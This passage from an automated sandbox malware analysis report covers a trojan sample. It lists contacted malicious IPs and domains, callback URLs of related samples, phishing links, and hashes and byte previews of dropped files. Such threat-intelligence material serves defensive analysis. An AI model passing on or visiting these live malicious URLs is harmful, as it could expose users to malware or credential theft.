                                                                                                    https://www.msn.com:443/en-us/feedexplorer.exe, 0000000A.00000000.41974746735.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42042323155.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42175553478.0000000005A54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl3.dexplorer.exe, 0000000A.00000000.42004108195.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.41939086451.0000000012015000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.42073133985.0000000012015000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.msn.com/en-us/music/celebrity/the-voice-ariana-grande-and-john-legend-walk-off-when-blakexplorer.exe, 0000000A.00000000.41912937738.0000000005A54000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        41.203.18.177
                                                                                                        		www.fungismartgrid.comSouth Africa
                                                                                                        		37153xneeloZAtrue
                                                                                                        68.65.122.211
                                                                                                        		schnellekreditfinanz.comUnited States
                                                                                                        		22612NAMECHEAP-NETUStrue
                                                                                                        23.227.38.74
                                                                                                        		shops.myshopify.comCanada
                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                        3.64.163.50
                                                                                                        		www.intelios.xyzUnited States
                                                                                                        		16509AMAZON-02UStrue
                                                                                                        192.64.117.165
                                                                                                        		herbalsfixng.xyzUnited States
                                                                                                        		22612NAMECHEAP-NETUStrue
                                                                                                        203.170.86.89
                                                                                                        		barsam.com.auAustralia
                                                                                                        		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                                                        93.184.220.29
                                                                                                        		unknownEuropean Union
                                                                                                        		15133EDGECASTUSfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                        Analysis ID:625008
                                                                                                        Start date and time: 12/05/202210:39:322022-05-12 10:39:32 +02:00
                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                        Overall analysis duration:0h 16m 57s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Sample file name:aSsc9zh1ex.exe
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                        Run name:Suspected Instruction Hammering
                                                                                                        Number of analysed new started processes analysed:24
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:1
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • HDC enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.evad.winEXE@7/8@29/7
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HDC Information:
                                                                                                        • Successful, ratio: 36.3% (good quality ratio 34.7%)
                                                                                                        • Quality average: 76.1%
                                                                                                        • Quality standard deviation: 25.5%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        • Number of executed functions: 86
                                                                                                        • Number of non-executed functions: 285
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Adjust boot time
                                                                                                        • Enable AMSI

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 51.105.236.244
                                                                                                        • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        No simulations

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        41.203.18.177SWIFT PAYMENT.exeGet hashmaliciousBrowse
                                                                                                        • www.ohmisoul.com/b6sq/?Yfu=-ZlpdlxpQxbhj&k63T=UWMcwWEbD0RkFhCbltBfWIhptpb7JcVoznOSxPEDirbsHwIowzfz+laK+cQNjMZ/PYix
                                                                                                        n14Gz5Qjcb.exeGet hashmaliciousBrowse
                                                                                                        • www.retreatreflectreplenish.com/m0np/?9rjPn6YP=Km21RG3Zlj6polzFCDT/l7u30qtQZo0QDOoZ4Hx2l618n0g/B5owEgzD2BuCeVjDgejb&j6782P=EZM4Hn6
                                                                                                        SYsObQNkC1.exeGet hashmaliciousBrowse
                                                                                                        • www.retreatreflectreplenish.com/m0np/?U2Jprb-=Km21RG3Zlj6polzFCDT/l7u30qtQZo0QDOoZ4Hx2l618n0g/B5owEgzD2COSR0z7+7Kc&cT=7nBDtz4x
                                                                                                        Payment Confirmation.exeGet hashmaliciousBrowse
                                                                                                        • www.ilovepretoria.com/ubqk/?zP_X=Hv4lQZ-HwdfpUlW&v8Ddg=uBo2J0iWpZMBLITkHx3chtugtoiSCA7XM5oNRaHNQ6Tu1xyeFgoTmXqyucABwXhpNwCdn80U1g==
                                                                                                        KUWf9JS752FbEqN.exeGet hashmaliciousBrowse
                                                                                                        • www.id-mensagency.com/b2dn/?7np=+kX3UVNfwr72TI/lSMKJWaSzPGrYFQWhspcpAbgQqoXKtVS6EryjJVBVAfBtJ7Rm50Fn&g0Dt=WvEhb
                                                                                                        ZTRADE0021.exeGet hashmaliciousBrowse
                                                                                                        • www.kitchinz.com/i8rz/?9r4P-=X55BSpOcMIPZ6Yb615k39ZsaaE9CZy303I5hHibCD//bPiY41uPI8jaJA0jaudkHMbYjiQ0FAw==&1bS=WHrpCdQ08
                                                                                                        sample.exeGet hashmaliciousBrowse
                                                                                                        • www.cape-winelands.info/kbr/
                                                                                                        9PROJECT Book NTA MACHINIO (M) SDN BHD.xlsx.exeGet hashmaliciousBrowse
                                                                                                        • www.doghurt.mobi/gh/
                                                                                                        68.65.122.211WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                                                                                        • www.schnellekreditfinanz.com/wn19/

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        barsam.com.auWWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                                                                                        • 203.170.86.89
                                                                                                        WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                                                                                        • 203.170.86.89
                                                                                                        www.intelios.xyzWWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                                                                                        • 3.64.163.50
                                                                                                        shops.myshopify.comPotvrda ponude.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        iqM872r4iu.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        2u2DWOubvh.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        New order for customer 99009141.xlsxGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        Docs advice copy.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        SecuriteInfo.com.W32.AIDetectNet.01.21900.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        NEW ORDER #00980.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        Yeni sipari#U015f _WJO-001.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        PLIST8985.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        dr053I4HK8.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        payment.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        Package.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        TT copy.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        TehmqnET0C.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        tjAWVBvXzq.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        Nueva cotizaci#U00f3n185225772.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        scan02424526628.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        Transfer_MT103.pdf.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74
                                                                                                        invoice.exeGet hashmaliciousBrowse
                                                                                                        • 23.227.38.74

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        xneeloZAform.xlsmGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        http://r20.rs6.net/tn.jsp?t=qcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=http%3A%2F%2Fhfpauliusjcwhitegh.legasilife.co.za/nibrown@seven.com.auGet hashmaliciousBrowse
                                                                                                        • 102.130.118.247
                                                                                                        armGet hashmaliciousBrowse
                                                                                                        • 156.38.239.167
                                                                                                        x86Get hashmaliciousBrowse
                                                                                                        • 197.221.56.220
                                                                                                        https://homefinishes.co.za/EM365/Get hashmaliciousBrowse
                                                                                                        • 129.232.156.27
                                                                                                        PO_04-29-2022_0929.lnkGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        PO_04-29-2022_0929.lnkGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        3ZhWeY0JJo.zipGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        810gMVdxHVGet hashmaliciousBrowse
                                                                                                        • 197.221.56.208
                                                                                                        yZKMF6K0f2Get hashmaliciousBrowse
                                                                                                        • 197.221.56.210
                                                                                                        form.xlsGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        3866892832495839346959952.xlsGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        form.xlsGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        VEuIqlISMa.vbsGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        6874878548319557371921810184.lnkGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        7g5SmEJaZ7Get hashmaliciousBrowse
                                                                                                        • 197.221.56.219
                                                                                                        5751879411642263817.doc.lnkGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        75744364019255557019031792.xlsGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        ssig4a96vhGet hashmaliciousBrowse
                                                                                                        • 41.203.16.149
                                                                                                        91382109147537561.xlsGet hashmaliciousBrowse
                                                                                                        • 129.232.188.93
                                                                                                        NAMECHEAP-NETUShttps://ad.doubleclick.net/ddm/clk/492846694;299712857;l;u=ds&sv1=0&sv2=3254733571074777&sv3=7926384508747481539&gclid=COyqr9nNgvICFYcDGwodblkA3A;%3fhttps://redirect.skimlinks.com/?id%253D179135X1650605%2526xs%253D1%2526url=http%3A%2F%2Fwww.amazon.com%2Famazon%2Famazon%2Famazon3696717%2F&url=https%3A%2F%2Fsign-wycf7djeeypdnjeaquy9vd3qfoaj63fb9opm4la83zc.website%E2%80%8B.yandexcloud.net%23adrian.steiger@zehndergroup.comGet hashmaliciousBrowse
                                                                                                        • 199.192.28.186
                                                                                                        TNT Consignment number#AWB811470484778.exeGet hashmaliciousBrowse
                                                                                                        • 198.187.30.47
                                                                                                        Shipping Documents.exeGet hashmaliciousBrowse
                                                                                                        • 198.187.30.47
                                                                                                        VM_May 11, 2022_41 22 6524 836_wav.htmlGet hashmaliciousBrowse
                                                                                                        • 198.54.115.107
                                                                                                        Product Inquiry.exeGet hashmaliciousBrowse
                                                                                                        • 198.187.30.47
                                                                                                        http://itgqw6nhx7.mobilesaga.com/#.aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtYkRLa1JaZzJ1cmNkaDhweE1EYmpmRXp6Q0Njd1pjWlBDQ1VYRWd0TlRENEE/I3ZpY2tpd3ljaGV1bmdAaGFuZ2x1bmcuY29tGet hashmaliciousBrowse
                                                                                                        • 68.65.122.49
                                                                                                        http://bkjj2z3hjo.purboposchim.online/#.aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtZkdld3FzUm5Mbm9iTEQ3ZHhWbkEyQnRLZkYzQXhLOTF5a2czSzVlYjViZGk/I2NvbW11bml0eWZ1bmRpbmdAaXBzd2ljaC5xbGQuZ292LmF1Get hashmaliciousBrowse
                                                                                                        • 199.188.206.59
                                                                                                        https://ygombertl.com/Get hashmaliciousBrowse
                                                                                                        • 199.188.200.169
                                                                                                        VM_May 11, 2022_41 22 6504 136_wav.htmlGet hashmaliciousBrowse
                                                                                                        • 198.54.119.143
                                                                                                        https://qualitymfax.zenfoliosite.com/Get hashmaliciousBrowse
                                                                                                        • 198.54.125.199
                                                                                                        TyTasyWsK7.exeGet hashmaliciousBrowse
                                                                                                        • 198.54.117.212
                                                                                                        https://allianzinsuranceglobal.com/?a=loginGet hashmaliciousBrowse
                                                                                                        • 198.54.116.166
                                                                                                        https://fastlaneco.trinket.io/sites/html-8539251c6dGet hashmaliciousBrowse
                                                                                                        • 104.219.248.46
                                                                                                        Kogbonds-Calling-Mail.htmlGet hashmaliciousBrowse
                                                                                                        • 198.54.119.143
                                                                                                        NEW PO.exeGet hashmaliciousBrowse
                                                                                                        • 198.187.29.17
                                                                                                        SecuriteInfo.com.Variant.Jaik.72878.27733.exeGet hashmaliciousBrowse
                                                                                                        • 198.187.30.47
                                                                                                        PO SPECIFICATION LIST A AND B WITH DRAWING SHEET.exeGet hashmaliciousBrowse
                                                                                                        • 198.187.30.47
                                                                                                        http://sx0pt8qi62.meksepa.com/#.aHR0cHM6Ly9ib3VuZGxlc3MtYnVzeS1nYXRld2F5LmdsaXRjaC5tZS9vY292aWUuaHRtbD8jYmlyZ2l0dGUuZ2FtQG1hZXJza2RyaWxsaW5nLmNvbQ==Get hashmaliciousBrowse
                                                                                                        • 68.65.123.61
                                                                                                        ST10501909262401.exeGet hashmaliciousBrowse
                                                                                                        • 198.54.117.210
                                                                                                        Payment receipts - All due Invoices.xlsxGet hashmaliciousBrowse
                                                                                                        • 198.54.116.184

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllaSsc9zh1ex.exeGet hashmaliciousBrowse
                                                                                                          TransportLabel_6170453602.xlsxGet hashmaliciousBrowse
                                                                                                            OR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
                                                                                                              DWG-1579.exeGet hashmaliciousBrowse
                                                                                                                RFQ-1579.exeGet hashmaliciousBrowse
                                                                                                                  DWG-1579.exeGet hashmaliciousBrowse
                                                                                                                    RFQ-1579.xlsxGet hashmaliciousBrowse
                                                                                                                      C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllaSsc9zh1ex.exeGet hashmaliciousBrowse
                                                                                                                        TransportLabel_6170453602.xlsxGet hashmaliciousBrowse
                                                                                                                          OR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60648
                                                                                                                            Entropy (8bit):6.273540391388373
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:VyIscWONgNnXigWuv3uuCRCF5AElVllzCix92FBo/SlOKsVjiVsRb2X9bhM:VDt5Ngg23TgNElDNeo/8OLjiOR6
                                                                                                                            MD5:00B917A158BB5BF0D6BFF7D6B3C81B12
                                                                                                                            SHA1:24A9B80C8EC794ADA4C8BAF717CFAB98459AC1DE
                                                                                                                            SHA-256:947BE059906893C09F222CB2868631638A219FB905A47E16A311BA5ADEB4B300
                                                                                                                            SHA-512:47B8EABDF404E19B2D953933D2D0C922CC538B3876D7664110CBD739605FFD151D24788E60B9935E6E4F7BB463F6BC7CED253CF31ED5C4D210495C301C7E5F45
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: aSsc9zh1ex.exe, Detection: malicious, Browse
                                                                                                                            • Filename: TransportLabel_6170453602.xlsx, Detection: malicious, Browse
                                                                                                                            • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                                                                                                                            Reputation:low
                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........P..K1.K1.K1.BIX.G1..Y.I1....J1..Y.D1..Y.C1..Y.H1.BIO.J1.BIH.J1.8S.N1.K1..1..X.H1..X.J1..X4.J1.K1\.J1..X.J1.RichK1.................PE..d....5;a.........." .........j...............................................0...... .....`.........................................`...................H.................... ..4.......p............................................... ............................text............................... ..`.rdata.. -..........................@..@.data...`'..........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..4.... ......................@..B................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):36576
                                                                                                                            Entropy (8bit):6.18658407883376
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:Vw33667/fhcAcwuVQydIDddeypaROhGkXMV3lBhjUK98krmRt8ZrqL1r8/lSNriq:q33oWsUK98vAqL1r8oFiQ7b2X9shHf
                                                                                                                            MD5:0B849C073801DCE25301ECA0146D534B
                                                                                                                            SHA1:5BB9251CA83FE96C8F52B35637E674A629ED1468
                                                                                                                            SHA-256:3F77E9EF8843DE3DA37037F21BCF6D7E990085D2BDC5B3F05E71AB5EBE5288BB
                                                                                                                            SHA-512:1C5C99BD93FBACD3BA56ADE806092AB86BA3FEA0BB70DE0FB89775285A71DB47F2400CF29757370CDC69F13FCBCF6513B25F4C8BBED0A15D65A9618BEE733A7F
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: aSsc9zh1ex.exe, Detection: malicious, Browse
                                                                                                                            • Filename: TransportLabel_6170453602.xlsx, Detection: malicious, Browse
                                                                                                                            • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                                                                                                                            • Filename: DWG-1579.exe, Detection: malicious, Browse
                                                                                                                            • Filename: RFQ-1579.exe, Detection: malicious, Browse
                                                                                                                            • Filename: DWG-1579.exe, Detection: malicious, Browse
                                                                                                                            • Filename: RFQ-1579.xlsx, Detection: malicious, Browse
                                                                                                                            Reputation:low
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.%.>.v.>.v.>.v.FNv.>.v.\.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.V.w.>.v.`.w.>.v.>.v.>.v!W.w.>.v!W.w.>.v!W"v.>.v.>Jv.>.v!W.w.>.vRich.>.v........................PE..d......a.........." .....>...\.......@.................................................... .........................................pd..l....d.......................p..........H....T..p...........................`U...............P...............................text....<.......>.................. ..`.rdata.......P.......B..............@..@.data...0....p.......`..............@....pdata...............b..............@..@.rsrc................h..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................

                                                                                                                            C:\Users\user\AppData\Local\Temp\CoverDes.exe.manifest

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1070
                                                                                                                            Entropy (8bit):4.836891219007383
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:JdtGOiNK+bIg4y3QdM/Ai8qTCNzgDQRnKVGaQkl:3U1K+bIg4y3QdaIzgDQh3aQkl
                                                                                                                            MD5:9B48061E7B9FC35CD2624F2B9102549E
                                                                                                                            SHA1:9DA640A8AF809549031916AB143026FAAF3B1E74
                                                                                                                            SHA-256:84839C6E85F9B73AA6B0F331A9EAADF7409B7B36E30BA0B04E31680069103E43
                                                                                                                            SHA-512:01CF7B5CBDEB1038E79076CB452AC63B0037C86570C3FE97B6C559823F43D515F34CAC963D3737B9EAF103F0EBDEBC1317B68091D4332C3615E87A3F25DF679E
                                                                                                                            Malicious:false
                                                                                                                            Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" />.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="NeGACOM" type="win32" version="17.0.0.0" processorArchitecture="x86" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="OnlineServices" version="17.0.0

                                                                                                                            C:\Users\user\AppData\Local\Temp\Strepera.wad

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):77432
                                                                                                                            Entropy (8bit):6.5191464617024995
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:0ryhqjc8wTqJ39FNvl4UXgmBfCotcEntclFVdwJZp:0ryTk3HdyYgmBfCscEilFVG
                                                                                                                            MD5:0CAED7F18389A6CC24391E0400C2BE47
                                                                                                                            SHA1:59288CED440D46970090F25983B409BB25F43BBF
                                                                                                                            SHA-256:E8C48296D444C8EDBF6169CA9E3C5334B0813BFC684C2E99BFD61C692A3784F1
                                                                                                                            SHA-512:AFC59C8EA01D5F96DFAB3CD08F088FF2136542C0F13435EE9D63795CD8BDEF6D746408296883CD9052BF21D6E87388295B4682F06913CC982B21868704277B93
                                                                                                                            Malicious:false
                                                                                                                            Preview:....f.f.....GE.......z.I.J=.yk.....W[...o....6......O-P.j"q..h.r...m.v..X...F.1.BV..p.,....Td...L|c.A.._C......~.7ws...4.Z...$...>..e.YS...&..l..._............}.a;'a..g*Y.DN.Ql.`.(+#;......%3...]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6...............O-P.j"q..h.r...m.v..X...F.1.BV..p.,....Td...L|c.A.._C......~.7ws...4.Z...$...>..e.YS...&.....}.a;'a..g*Y.DN.Ql.`.(+#;......1.......k..|3...]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6......O-P.......n....."q..h.r...m.v..X...F.1.BV..p.,....Td...L|c.A.._C......~.7ws...4.Z...$...>..e.YS...&.....}.a;'a..g*Y.DN.Ql.`.(+#;......%3...4.*..:.............]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6......O-P.j"q..h.r...m.v..X...F.1.BV.......f.........p.,....Td...L|c.A.._C......~.7ws...4.Z...$...>..e.YS.

                                                                                                                            C:\Users\user\AppData\Local\Temp\emblem-default-symbolic.symbolic.png

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288
                                                                                                                            Entropy (8bit):7.002703251110111
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:6v/lhPysDjYOGW78zHS1w9xuIGXdvkFRBp9rXHEb/GY1IX2NYKjp:6v/7jjYOGW7Rw9xu6pxHG/VIX6F
                                                                                                                            MD5:A83F8C904AFA9E3F6A50D263747CF6DF
                                                                                                                            SHA1:7B9D99B950518FCAF5AC59350823D2B20E82956F
                                                                                                                            SHA-256:F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
                                                                                                                            SHA-512:4B2DC243E86514BDC816B92808C491EF71B72690F25C2372FE909CED3A103F990708C507065169FA5C6F823A8B1ADADB7BF13696E78C807A973789CF14CA3A06
                                                                                                                            Malicious:false
                                                                                                                            Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...N.Q...'.....X.s.^../H.f.....BJ....V[.b..qsvA..d..y.9?...z.`./....'..[.Q..'...M.....mwuN.\....h..(|........p.K..I.%..... ..*..x.t~.kW.`V'.8.W.K.l.4..9.&\..k..3F........4.0.op.rL#.....N:.=.T.[....L.....p...#....IEND.B`.

                                                                                                                            C:\Users\user\AppData\Local\Temp\face-crying.png

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):893
                                                                                                                            Entropy (8bit):7.712327619290152
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:6v/7M/6CsI5hmePcdiB6BV3h8SkKc47zOTtcC8VErf6qdY94OR/vlNMgmaGe7fb:q65hBcs6L3h6hBcCLrDq42nMDanb
                                                                                                                            MD5:473EE416AF2C1AE05AA7D5D004C9B3D2
                                                                                                                            SHA1:EEC352E25F562C0386D5C92384A70B3005D40D6F
                                                                                                                            SHA-256:2C48F1719BBC825592FB0929E31DCFE66578665D28099087EA98EF261688DC18
                                                                                                                            SHA-512:2B05C9920CFDCF378448F35B14AA56078051584CA0DB15F43B5A27272B072DD8A76BBC2829DF4C7C7BAF8339839974A00CA7BFFB8425B7D9494421CCC9EE80C1
                                                                                                                            Malicious:false
                                                                                                                            Preview:.PNG........IHDR................a...DIDATx.e.C..H.F_..tzl{m.m.m.m..;=F+..j.......r.........hZ...%Sn...Z....|g...o.c..f..k..#.Y.5..2...r44.t...[|.EW....E..3v....o...n...y.V.%.\g.].XY.).PQ..h~.Mu.:I.~.!{dt...-....c........~.ihs..<.23h.q...AA....P.O.d.#....S%....w....~(.Yg.mL.`..r.U?A.D......%.t..~.b..wl...G\r.......,^m.b%..??...?./........O..w\|..t..5...^x....cK..?..b...3^#i.xYp3.>..C<Q.yg^.3.=..;./..!.`.....dq%...`..wB....q.2....W....S`....E....q3.A....9...."..].+.f...-.Z)d*..h..O>......c>...=.P..!...pw}g..t&.=..Dd...i.f......\....-JO0hW....!.ic.%...s.+...iG|..MK...O_..;_.q_....|...F....M...O...o..5.=...y{...]hn..Z..L+..`r.&I...5t._Dz..m.~$n$..|.u}_.n|.53..b.+Zn.bCA.1..x..hv?.{8...!\J......>OukN..{...[#.....7....k..L.#...D.y:K5.|.&..XV.U..rb..T..G..6.I...~.....i.#ike...9/B_&.....^v]..._.l.Et.i..M..l.B1...A.....>._...P.,... ....IEND.B`.

                                                                                                                            C:\Users\user\AppData\Local\Temp\nso8B47.tmp\System.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12288
                                                                                                                            Entropy (8bit):5.814115788739565
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                            MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
